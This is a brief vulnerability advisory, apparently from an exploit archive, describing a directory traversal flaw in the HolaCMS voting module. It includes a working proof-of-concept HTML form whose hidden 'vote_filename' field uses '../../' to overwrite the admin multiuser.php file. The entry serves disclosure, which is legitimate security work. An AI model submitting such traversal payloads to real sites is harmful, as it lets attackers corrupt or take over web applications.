|
HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability
The following example was provided using a form to submit a custom HTTP POST to the site: <form action="http://www.example.com/[site-with-vote].php?vote=1" method="POST"> <input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php"> <input type="hidden" name="result" value="0"> <input type="submit" value="Stimme abgeben" name="button"> </form> |
|
|
Privacy Statement |